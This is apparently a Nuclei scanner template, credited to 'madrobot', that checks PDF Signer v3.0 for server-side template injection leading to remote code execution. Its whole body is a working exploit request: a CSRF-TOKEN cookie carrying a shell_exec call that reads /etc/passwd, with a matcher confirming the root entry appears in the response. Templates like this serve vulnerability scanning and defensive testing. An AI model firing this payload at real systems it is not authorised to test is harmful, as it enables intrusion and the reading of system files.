id: pdf-signer-ssti-to-rce info: name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie author: madrobot severity: high requests: - method: GET path: - "{{BaseURL}}/" headers: Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:" part: body